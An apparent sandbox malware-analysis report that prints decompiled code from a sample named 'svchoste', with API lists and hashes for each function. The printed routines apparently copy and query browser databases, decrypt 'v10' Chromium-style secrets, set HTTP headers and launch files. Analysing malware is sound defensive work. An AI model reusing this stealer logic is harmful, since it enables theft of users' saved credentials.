Instruction ID: 95d889d8ee79b838b89e0a13f4ca611a8ea4913fa7a9e2f7a1b006a18f18a407
Opcode Fuzzy Hash: 2ca5ac6bf259b6aa19feddafb8f581b22dffeb139c617739d6d07f689b681194
Instruction Fuzzy Hash: 207146B0914258AFCF26EF28CC85BEAB7F9AB55304F1881E8E51967252D7319F84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B917A0, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 79
networkCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00B917A0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v48;
				intOrPtr _v52;
				signed int _t26;
				long _t30;
				long _t35;
				long _t39;
				long _t43;
				void* _t47;
				signed int _t72;

				_push(0xffffffff);
				_push(E00B964E5);
				_push( *[fs:0x0]);
				_t26 =  *0xba01f4; // 0xac8b3e58
				_t27 = _t26 ^ _t72;
				_v20 = _t26 ^ _t72;
				 *[fs:0x0] =  &_v16;
				_v52 = __ecx;
				E00B711C0( &_v48, "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1");
				_v8 = 0;
				_t30 = E00B71350( &_v48);
				HttpAddRequestHeadersA(_a4, E00B71330( &_v48), _t30, 0x20000000);
				E00B71EA0( &_v48, "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8");
				_t35 = E00B71350( &_v48);
				HttpAddRequestHeadersA(_a4, E00B71330( &_v48), _t35, 0x20000000);
				E00B71EA0( &_v48, "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1");
				_t39 = E00B71350( &_v48);
				HttpAddRequestHeadersA(_a4, E00B71330( &_v48), _t39, 0x20000000);
				E00B71EA0( &_v48, "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0");
				_t43 = E00B71350( &_v48);
				HttpAddRequestHeadersA(_a4, E00B71330( &_v48), _t43, 0x20000000);
				_v8 = 0xffffffff;
				_t47 = E00B712D0( &_v48);
				 *[fs:0x0] = _v16;
				return E00B74354(_t47, __ebx, _v20 ^ _t72, _a4, __edi, __esi, _t27);
			}

0x00b917a3
0x00b917a5
0x00b917b0
0x00b917b4
0x00b917b9
0x00b917bb
0x00b917c2
0x00b917c8
0x00b917d3
0x00b917d8
0x00b917e7
0x00b917fa
0x00b91808
0x00b91815
0x00b91828
0x00b91836
0x00b91843
0x00b91856
0x00b91864
0x00b91871
0x00b91884
0x00b9188a
0x00b91894
0x00b9189c
0x00b918b1

APIs

HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00B917FA
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00B91828
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00B91856
HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 00B91884

Strings

Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00B917CB
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 00B9182E
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00B9185C
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 00B91800

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: HeadersHttpRequest
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
API String ID: 1754618566-787135837
Opcode ID: abd644ffa2df604d96c55296c34f44b6328566e92162e5e5a33455449871bcbb
Instruction ID: 4b89dd42900bc3bc5481aca06fa1a0b3efb87d9e4709cc3b09f6cd9aec703ef3
Opcode Fuzzy Hash: abd644ffa2df604d96c55296c34f44b6328566e92162e5e5a33455449871bcbb
Instruction Fuzzy Hash: 0831AD72900108AADB04EBBCDC55FDEB7B8AB18740F50C569F526B7591DF346608CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00B907B0, Relevance: 12.2, APIs: 8, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00B907B0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				char _v540;
				intOrPtr _v544;
				char _v548;
				intOrPtr* _v552;
				char* _v556;
				intOrPtr _v560;
				char _v561;
				intOrPtr* _v568;
				char* _v572;
				intOrPtr _v576;
				char _v577;
				intOrPtr* _v584;
				char* _v588;
				intOrPtr _v592;
				char _v593;
				void* __ebp;
				signed int _t64;
				CHAR* _t69;
				intOrPtr _t72;
				void* _t73;
				intOrPtr* _t74;
				void* _t79;
				intOrPtr _t80;
				intOrPtr* _t81;
				void* _t86;
				intOrPtr* _t88;
				intOrPtr _t92;
				void* _t94;
				intOrPtr _t98;
				intOrPtr _t102;
				intOrPtr _t110;
				intOrPtr _t124;
				intOrPtr _t129;
				signed int _t137;
				void* _t138;
				void* _t144;
				void* _t146;
				void* _t148;
				void* _t149;

				_t136 = __esi;
				_t135 = __edi;
				_t99 = __ebx;
				_t64 =  *0xba01f4; // 0xac8b3e58
				_v12 = _t64 ^ _t137;
				E00B791C0( &_v540, 0, 0x104);
				E00B791C0( &_v276, 0, 0x104);
				_t69 =  *0xba26f4; // 0x2d01528
				wsprintfA( &_v540, _t69, _a4);
				_v8 = E00B86CE0( &_v540, 0);
				_t72 =  *0xba224c; // 0x2d01558
				_push(_t72);
				_t73 = E00B75DBC(__ebx, __edi, __esi, _t64 ^ _t137);
				_t102 =  *0xba224c; // 0x2d01558
				_t74 = E00B8A890(_a8, _t102, _t73);
				_t144 = _t138 + 0x3c;
				_v552 = _t74;
				_v556 =  &_v276;
				_v560 = _v556;
				do {
					_v561 =  *_v552;
					 *_v556 = _v561;
					_v552 = _v552 + 1;
					_v556 = _v556 + 1;
					_t153 = _v561;
				} while (_v561 != 0);
				_t124 =  *0xba21c4; // 0x2d05938
				_push(_t124);
				_t79 = E00B75DBC(__ebx, __edi, __esi, _t153);
				_t80 =  *0xba21c4; // 0x2d05938
				_t81 = E00B8A890( &_v276, _t80, _t79);
				_t146 = _t144 + 0x10;
				_v568 = _t81;
				_v572 =  &_v276;
				_v576 = _v572;
				do {
					_v577 =  *_v568;
					 *_v572 = _v577;
					_v568 = _v568 + 1;
					_v572 = _v572 + 1;
					_t154 = _v577;
				} while (_v577 != 0);
				_t110 =  *0xba24ec; // 0x2d058c0
				_push(_t110);
				_t86 = E00B75DBC(__ebx, __edi, __esi, _t154);
				_t129 =  *0xba24ec; // 0x2d058c0
				_t88 = E00B8A890( &_v276, _t129, _t86);
				_t148 = _t146 + 0x10;
				_v584 = _t88;
				_v588 =  &_v276;
				_v592 = _v588;
				do {
					_v593 =  *_v584;
					 *_v588 = _v593;
					_v584 = _v584 + 1;
					_t133 = _v588 + 1;
					_v588 = _v588 + 1;
				} while (_v593 != 0);
				_t92 = E00B7540F(__ebx, _t133, __edi, _a12, ",",  &_v548);
				_t149 = _t148 + 0xc;
				_v544 = _t92;
				while(1) {
					_t156 = _v544;
					if(_v544 == 0) {
						break;
					}
					E00B902A0(_t99, _v544, _t135, _t136, _t156, _v8, 0xb994ce,  &_v276, _v544);
					_t133 =  &_v548;
					_t98 = E00B7540F(_t99,  &_v548, _t135, 0, ",",  &_v548);
					_t149 = _t149 + 0x1c;
					_v544 = _t98;
				}
				_t94 = E00B87A10(_v8);
				__eflags = _v12 ^ _t137;
				return E00B74354(_t94, _t99, _v12 ^ _t137, _t133, _t135, _t136);
			}

0x00b907b0
0x00b907b0
0x00b907b0
0x00b907b9
0x00b907c0
0x00b907d1
0x00b907e7
0x00b907f3
0x00b90800
0x00b9081a
0x00b9081d
0x00b90822
0x00b90823
0x00b9082c
0x00b90837
0x00b9083c
0x00b9083f
0x00b9084b
0x00b90857
0x00b9085d
0x00b90865
0x00b90877
0x00b90882
0x00b90891
0x00b90897
0x00b90897
0x00b908a0
0x00b908a6
0x00b908a7
0x00b908b0
0x00b908bd
0x00b908c2
0x00b908c5
0x00b908d1
0x00b908dd
0x00b908e3
0x00b908eb
0x00b908fd
0x00b90908
0x00b90917
0x00b9091d
0x00b9091d
0x00b90926
0x00b9092c
0x00b9092d
0x00b90936
0x00b90944
0x00b90949
0x00b9094c
0x00b90958
0x00b90964
0x00b9096a
0x00b90972
0x00b90984
0x00b9098f
0x00b9099b
0x00b9099e
0x00b909a4
0x00b909bd
0x00b909c2
0x00b909c5
0x00b909cb
0x00b909cb
0x00b909d2
0x00000000
0x00000000
0x00b909eb
0x00b909f3
0x00b90a01
0x00b90a06
0x00b90a09
0x00b90a09
0x00b90a15
0x00b90a20
0x00b90a2a

APIs

_memset.LIBCMT ref: 00B907D1
_memset.LIBCMT ref: 00B907E7
wsprintfA.USER32 ref: 00B90800
__wgetenv.LIBCMT ref: 00B90823
__wgetenv.LIBCMT ref: 00B908A7
__wgetenv.LIBCMT ref: 00B9092D
_strtok_s.LIBCMT ref: 00B909BD
_strtok_s.LIBCMT ref: 00B90A01

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: __wgetenv$_memset_strtok_s$wsprintf
String ID:
API String ID: 1594673334-0
Opcode ID: 3ae3cea1ce51f68aedeacad1da4805854f734fe55eb295a49cd9cad9ee4d8882
Instruction ID: dc0829f5c1c239db5b90a849b8e9c76132454b4fc26ba5b85f14bce876c9ca03
Opcode Fuzzy Hash: 3ae3cea1ce51f68aedeacad1da4805854f734fe55eb295a49cd9cad9ee4d8882
Instruction Fuzzy Hash: 06614BB5D01228AFCB25EB68DC89BD9B7B4AF59304F0481E9E50DA7351EA309F84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B950, Relevance: 12.1, APIs: 8, Instructions: 123
filestringCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00B8B950(void* __ebx, void* __edi, void* __esi, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				char _v284;
				char _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				void* __ebp;
				signed int _t33;
				void* _t45;
				int _t46;
				void* _t49;
				intOrPtr _t53;
				void* _t55;
				void* _t63;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				CHAR* _t78;
				intOrPtr _t85;
				void* _t86;
				void* _t87;
				signed int _t88;
				void* _t89;
				void* _t92;
				void* _t93;
				void* _t96;

				_t87 = __esi;
				_t86 = __edi;
				_t63 = __ebx;
				_t33 =  *0xba01f4; // 0xac8b3e58
				_v20 = _t33 ^ _t88;
				GetCurrentDirectoryA(0x104,  &_v548);
				_t64 =  *0xba2400; // 0x2d066f0
				 *0xba28c4( &_v548, _t64);
				CopyFileA(_a4,  &_v548, 1);
				E00B791C0( &_v284, 0, 0x104);
				_t78 =  *0xba21a8; // 0x2d06220
				wsprintfA( &_v284, _t78, _a12, _a8);
				_t67 =  *0xba2390; // 0x2d06fa0
				_v12 = _t67;
				_t45 =  *0xba2750( &_v548,  &_v8);
				_t92 = _t89 + 0x24;
				if(_t45 == 0) {
					_t49 =  *0xba2700(_v8, _v12, 0xffffffff,  &_v16, 0);
					_t93 = _t92 + 0x14;
					if(_t49 == 0) {
						_t72 =  *0xba21d0; // 0x2d010d8
						_t53 = E00B755AB( &_v284, _t72);
						_t93 = _t93 + 8;
						_v552 = _t53;
						if(_v552 != 0) {
							while(1) {
								_t55 =  *0xba2720(_v16);
								_t96 = _t93 + 4;
								_t103 = _t55 - 0x64;
								if(_t55 != 0x64) {
									break;
								}
								_v560 =  *0xba273c(_v16, 0);
								_v556 =  *0xba273c(_v16, 1);
								_push(_v556);
								_push(_v560);
								_t85 =  *0xba24f8; // 0x2d067b0
								_push(_t85);
								_push(_v552);
								E00B755C2(_t63, _t86, _t87, _t103);
								_push("\n");
								_push(_v552);
								E00B755C2(_t63, _t86, _t87, _t103);
								_t93 = _t96 + 0x28;
							}
							_push(_v552);
							E00B75EA3(_t63, _v552, _t86, _t87, __eflags);
							_t93 = _t96 + 4;
						}
					}
					 *0xba2724(_v16);
					 *0xba2754(_v8);
				}
				_t46 = DeleteFileA( &_v548);
				__eflags = _v20 ^ _t88;
				return E00B74354(_t46, _t63, _v20 ^ _t88,  &_v548, _t86, _t87);
			}

0x00b8b950
0x00b8b950
0x00b8b950
0x00b8b959
0x00b8b960
0x00b8b96f
0x00b8b975
0x00b8b983
0x00b8b996
0x00b8b9aa
0x00b8b9ba
0x00b8b9c8
0x00b8b9d1
0x00b8b9d7
0x00b8b9e5
0x00b8b9eb
0x00b8b9f0
0x00b8ba06
0x00b8ba0c
0x00b8ba11
0x00b8ba17
0x00b8ba25
0x00b8ba2a
0x00b8ba2d
0x00b8ba3a
0x00b8ba40
0x00b8ba44
0x00b8ba4a
0x00b8ba4d
0x00b8ba50
0x00000000
0x00000000
0x00b8ba61
0x00b8ba76
0x00b8ba82
0x00b8ba89
0x00b8ba8a
0x00b8ba90
0x00b8ba97
0x00b8ba98
0x00b8baa0
0x00b8baab
0x00b8baac
0x00b8bab1
0x00b8bab1
0x00b8babc
0x00b8babd
0x00b8bac2
0x00b8bac2
0x00b8ba3a
0x00b8bac9
0x00b8bad6
0x00b8badc
0x00b8bae6
0x00b8baef
0x00b8baf9

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00B8B96F
lstrcat.KERNEL32(?,02D066F0), ref: 00B8B983
CopyFileA.KERNEL32(?,?,00000001), ref: 00B8B996
_memset.LIBCMT ref: 00B8B9AA
wsprintfA.USER32 ref: 00B8B9C8
DeleteFileA.KERNEL32(?), ref: 00B8BAE6

Part of subcall function 00B755AB: __fsopen.LIBCMT ref: 00B755B8

_fprintf.LIBCMT ref: 00B8BA98
_fprintf.LIBCMT ref: 00B8BAAC

Part of subcall function 00B755C2: __lock_file.LIBCMT ref: 00B75609
Part of subcall function 00B755C2: __stbuf.LIBCMT ref: 00B7568D
Part of subcall function 00B755C2: __output_l.LIBCMT ref: 00B7569D
Part of subcall function 00B755C2: __ftbuf.LIBCMT ref: 00B756A7

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcatwsprintf
String ID:
API String ID: 556801341-0
Opcode ID: 7d765680505e3a41ce0ed22ee07924d26dc2b0c1bc6e01c42c8e7c2f23f4047d
Instruction ID: ca28addba852c3b42c32425c6feb387c4314a7709c03af6c61152e63144fe3e1
Opcode Fuzzy Hash: 7d765680505e3a41ce0ed22ee07924d26dc2b0c1bc6e01c42c8e7c2f23f4047d
Instruction Fuzzy Hash: 3B4142B1900208BBDB14DFA8EC8AEEE77B8EF49300F048598F61997251DA35AE54CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00B8C690, Relevance: 12.1, APIs: 8, Instructions: 100
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00B8C690(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebp;
				intOrPtr _t15;
				struct HINSTANCE__* _t19;
				CHAR* _t22;
				struct HINSTANCE__* _t24;
				CHAR* _t27;
				CHAR* _t36;
				CHAR* _t37;
				struct HINSTANCE__* _t38;
				CHAR* _t39;
				struct HINSTANCE__* _t40;
				intOrPtr _t42;
				CHAR* _t43;
				struct HINSTANCE__* _t44;
				CHAR* _t45;
				struct HINSTANCE__* _t46;

				_t57 = _a4;
				if(_a4 == 0) {
					__eflags = 0;
					return 0;
				}
				_t15 =  *0xba20d4; // 0x2d010c0
				_push(_t15);
				_v8 = E00B75DBC(__ebx, __edi, __esi, _t57);
				_t58 = _v8;
				if(_v8 != 0) {
					_push(0);
					_push(_a4);
					_v12 = E00B8A3B0(_v8, ";");
					_push(0);
					_t42 =  *0xba2690; // 0x2d06760
					_push(E00B8A3B0(_t42, _v12));
					E00B76934(__ebx, _v8, __edi, __esi, _t58);
					_v16 = _v12;
					_push(_v16);
					E00B75122();
				}
				_t36 =  *0xba2440; // 0x2d014d8
				 *0xba2744 = LoadLibraryA(_t36);
				if( *0xba2744 != 0) {
					_t43 =  *0xba22b8; // 0x2d059c8
					_t19 =  *0xba2744; // 0x0
					 *0xba2738 = GetProcAddress(_t19, _t43);
					_t37 =  *0xba25a8; // 0x2d05968
					_t44 =  *0xba2744; // 0x0
					 *0xba2764 = GetProcAddress(_t44, _t37);
					_t22 =  *0xba21e4; // 0x2d05fc0
					_t38 =  *0xba2744; // 0x0
					 *0xba2708 = GetProcAddress(_t38, _t22);
					_t45 =  *0xba2178; // 0x2d05980
					_t24 =  *0xba2744; // 0x0
					 *0xba2730 = GetProcAddress(_t24, _t45);
					_t39 =  *0xba26d4; // 0x2d061a0
					_t46 =  *0xba2744; // 0x0
					 *0xba2748 = GetProcAddress(_t46, _t39);
					_t27 =  *0xba2338; // 0x2d05998
					_t40 =  *0xba2744; // 0x0
					 *0xba2728 = GetProcAddress(_t40, _t27);
				}
				if( *0xba2738 == 0 ||  *0xba2764 == 0 ||  *0xba2708 == 0 ||  *0xba2748 == 0 ||  *0xba2728 == 0 ||  *0xba2730 == 0) {
					_v20 = 0;
				} else {
					_v20 = 1;
				}
				return _v20;
			}

0x00b8c696
0x00b8c69a
0x00b8c7fd
0x00000000
0x00b8c7fd
0x00b8c6a0
0x00b8c6a5
0x00b8c6ae
0x00b8c6b1
0x00b8c6b5
0x00b8c6b7
0x00b8c6bc
0x00b8c6ce
0x00b8c6d1
0x00b8c6d7
0x00b8c6e6
0x00b8c6e7
0x00b8c6f2
0x00b8c6f8
0x00b8c6f9
0x00b8c6fe
0x00b8c701
0x00b8c70e
0x00b8c71a
0x00b8c720
0x00b8c727
0x00b8c733
0x00b8c738
0x00b8c73f
0x00b8c74c
0x00b8c751
0x00b8c757
0x00b8c764
0x00b8c769
0x00b8c770
0x00b8c77c
0x00b8c781
0x00b8c788
0x00b8c795
0x00b8c79a
0x00b8c7a0
0x00b8c7ad
0x00b8c7ad
0x00b8c7b9
0x00b8c7f1
0x00b8c7e8
0x00b8c7e8
0x00b8c7e8
0x00000000

APIs

__wgetenv.LIBCMT ref: 00B8C6A6
LoadLibraryA.KERNEL32(02D014D8), ref: 00B8C708
GetProcAddress.KERNEL32(00000000,02D059C8), ref: 00B8C72D
GetProcAddress.KERNEL32(00000000,02D05968), ref: 00B8C746
GetProcAddress.KERNEL32(00000000,02D05FC0), ref: 00B8C75E
GetProcAddress.KERNEL32(00000000,02D05980), ref: 00B8C776
GetProcAddress.KERNEL32(00000000,02D061A0), ref: 00B8C78F
GetProcAddress.KERNEL32(00000000,02D05998), ref: 00B8C7A7

Part of subcall function 00B76934: __lock.LIBCMT ref: 00B76942
Part of subcall function 00B76934: __putenv_helper.LIBCMT ref: 00B76951

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: AddressProc$LibraryLoad__lock__putenv_helper__wgetenv
String ID:
API String ID: 1998870925-0
Opcode ID: f941e06cdb5ec94896c5c0748fbbaeb02380ebf9bbce2e4a93440f0afaf0f6d5
Instruction ID: da709fa7ef279835f2de89605108d7db2bc0e9deb1b93295834f1f704fd9830d
Opcode Fuzzy Hash: f941e06cdb5ec94896c5c0748fbbaeb02380ebf9bbce2e4a93440f0afaf0f6d5
Instruction Fuzzy Hash: EF41FAB5910204EFDB18EFACED9AB6A7BF4E74A300F104559E90593270DB759E80CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00B90130, Relevance: 12.1, APIs: 8, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00B90130(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v16;
				signed int _v20;
				char _v288;
				char _v616;
				char _v880;
				signed int _t24;
				signed int _t25;
				void* _t37;
				void* _t38;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				signed int _t68;
				void* _t75;

				_t75 = __eflags;
				_t67 = __esi;
				_t66 = __edi;
				_t48 = __ebx;
				_t24 =  *0xba01f4; // 0xac8b3e58
				_t25 = _t24 ^ _t68;
				_v20 = _t25;
				 *[fs:0x0] =  &_v16;
				E00B91620( &_v616, __edi, __esi, 0xb99493, 0xfde9, 0, 0, 0);
				_v8 = 0;
				E00B791C0( &_v880, 0, 0x104);
				E00B791C0( &_v288, 0, 0x104);
				_t62 =  *0xba2570; // 0x2d00560
				 *0xba28c4( &_v880, _t62, _t25,  *[fs:0x0], E00B9670A, 0xffffffff);
				 *0xba28c4( &_v880, E00B8A580(_t62, __edi, __esi, _t75, 0xc));
				_t63 =  *0xba2404; // 0x2d00580
				 *0xba28c4( &_v880, _t63);
				_t37 = E00B928E0(__ebx,  &_v616, __edi, __esi, _a4);
				_t76 = _t37;
				if(_t37 != 0) {
					E00B91440( &_v616,  &_v880);
					 *0xba28c4( &_v288,  &_v880);
					_t65 =  *0xba2254; // 0x2d013f0
					 *0xba28c4( &_v288, _t65);
					_t61 =  *0xba26b8; // 0x2d01418
					_t63 =  &_v288;
					E00B8A200(__ebx, _t61, _t66, _t67, _t76,  &_v288, _t61);
					ShellExecuteA(0, 0,  &_v880, 0xb9949a, 0, 0);
				}
				_v8 = 0xffffffff;
				_t38 = E00B915C0( &_v616);
				 *[fs:0x0] = _v16;
				return E00B74354(_t38, _t48, _v20 ^ _t68, _t63, _t66, _t67);
			}

0x00b90130
0x00b90130
0x00b90130
0x00b90130
0x00b90147
0x00b9014c
0x00b9014e
0x00b90155
0x00b90171
0x00b90176
0x00b9018b
0x00b901a1
0x00b901a9
0x00b901b7
0x00b901cf
0x00b901d5
0x00b901e3
0x00b901f3
0x00b901f8
0x00b901fa
0x00b90209
0x00b9021c
0x00b90222
0x00b90230
0x00b90236
0x00b9023d
0x00b90244
0x00b90260
0x00b90260
0x00b90266
0x00b90273
0x00b9027b
0x00b90290

APIs

Part of subcall function 00B91620: _memset.LIBCMT ref: 00B91634
Part of subcall function 00B91620: _strcpy_s.LIBCMT ref: 00B91653
Part of subcall function 00B91620: _memset.LIBCMT ref: 00B9168E

_memset.LIBCMT ref: 00B9018B
_memset.LIBCMT ref: 00B901A1
lstrcat.KERNEL32(00000000,02D00560), ref: 00B901B7

Part of subcall function 00B8A580: _malloc.LIBCMT ref: 00B8A58A
Part of subcall function 00B8A580: GetTickCount.KERNEL32 ref: 00B8A59B
Part of subcall function 00B8A580: _rand.LIBCMT ref: 00B8A5C4
Part of subcall function 00B8A580: wsprintfA.USER32 ref: 00B8A5E0

lstrcat.KERNEL32(00000000,00000000), ref: 00B901CF
lstrcat.KERNEL32(00000000,02D00580), ref: 00B901E3
lstrcat.KERNEL32(?,00000000), ref: 00B9021C
lstrcat.KERNEL32(?,02D013F0), ref: 00B90230

Part of subcall function 00B8A200: _fprintf.LIBCMT ref: 00B8A221

ShellExecuteA.SHELL32(00000000,00000000,00000000,00B9949A,00000000,00000000), ref: 00B90260

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: lstrcat$_memset$CountExecuteShellTick_fprintf_malloc_rand_strcpy_swsprintf
String ID:
API String ID: 1303573618-0
Opcode ID: 83c6a4eab9500c9bbd8edc5f6d81f906cd20cc26bb372d4f5dc8a0810d35f542
Instruction ID: ccc57defc37147c39ad42276fdea8add5772513f99ee8473c7779c04097a7b98
Opcode Fuzzy Hash: 83c6a4eab9500c9bbd8edc5f6d81f906cd20cc26bb372d4f5dc8a0810d35f542
Instruction Fuzzy Hash: 20317376940208BBDB15EB54DC47FEA73F8AB05B00F0085E5BA15672D0DB756B44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B8D730, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 144
memoryCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E00B8D730(void* __ebx, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				long _v92;
				void* _v96;
				signed int _v100;
				char _v128;
				signed int _v132;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t70;
				void* _t94;
				char* _t129;
				void* _t130;
				intOrPtr _t131;
				void* _t132;
				signed int _t133;
				intOrPtr _t143;

				_t94 = __ebx;
				_push(0xffffffff);
				_push(E00B9648B);
				_push( *[fs:0x0]);
				_t69 =  *0xba01f4; // 0xac8b3e58
				_t70 = _t69 ^ _t133;
				_v100 = _t70;
				_push(_t131);
				_push(_t129);
				_push(_t70);
				 *[fs:0x0] =  &_v16;
				_v132 = 0;
				if(_a12 < 3) {
					L10:
					_t120 = _a12;
					E00B711C0(_a4, E00B8CD30(_a12, _t129, _t131, 0, _a8, _a12));
					_v132 = _v132 | 0x00000001;
					_t75 = _a4;
					L11:
					 *[fs:0x0] = _v16;
					_pop(_t130);
					_pop(_t132);
					return E00B74354(_t75, _t94, _v100 ^ _t133, _t120, _t130, _t132);
				}
				_t129 = "v10";
				_t131 = _a8;
				asm("repe cmpsb");
				if(0 != 0) {
					goto L10;
				} else {
					_t143 = _a20;
					_t120 = 0 | _t143 != 0x00000000;
					if(((0 | _a16 != 0x00000000) & _t143 != 0x00000000) == 0) {
						E00B711C0(_a4, "null");
						_v132 = _v132 | 0x00000001;
						_t75 = _a4;
					} else {
						E00B791C0( &_v88, 0, 0x40);
						_v88 = 0x40;
						_v84 = 1;
						_v80 = _a8 + 3;
						_v76 = 0xc;
						_v64 = _v80 + _a12 - 0x13;
						_v60 = 0x10;
						_t120 = _a12 - 3 - _v76 - _v60;
						_v92 = _a12 - 3 - _v76 - _v60;
						_v96 = LocalAlloc(0x40, _v92);
						if(_v96 != 0) {
							_t120 = _v92;
							_v20 =  *0xba28cc(_a20, _v80 + _v76, _v92,  &_v88, 0, 0, _v96, _v92,  &_v92, 0);
							if(_v20 < 0) {
								E00B711C0(_a4, "null");
								_v132 = _v132 | 0x00000001;
								_t75 = _a4;
							} else {
								E00B73F50( &_v128, _v96, _v92);
								_v8 = 0;
								E00B71240(_a4,  &_v128);
								_t120 = _v132 | 0x00000001;
								_v132 = _v132 | 0x00000001;
								_v8 = 0xffffffff;
								E00B712D0( &_v128);
								_t75 = _a4;
							}
						}
					}
					goto L11;
				}
			}

0x00b8d730
0x00b8d733
0x00b8d735
0x00b8d740
0x00b8d744
0x00b8d749
0x00b8d74b
0x00b8d74e
0x00b8d74f
0x00b8d750
0x00b8d754
0x00b8d75a
0x00b8d765
0x00b8d8b6
0x00b8d8b6
0x00b8d8ca
0x00b8d8d5
0x00b8d8d8
0x00b8d8db
0x00b8d8de
0x00b8d8e6
0x00b8d8e7
0x00b8d8f5
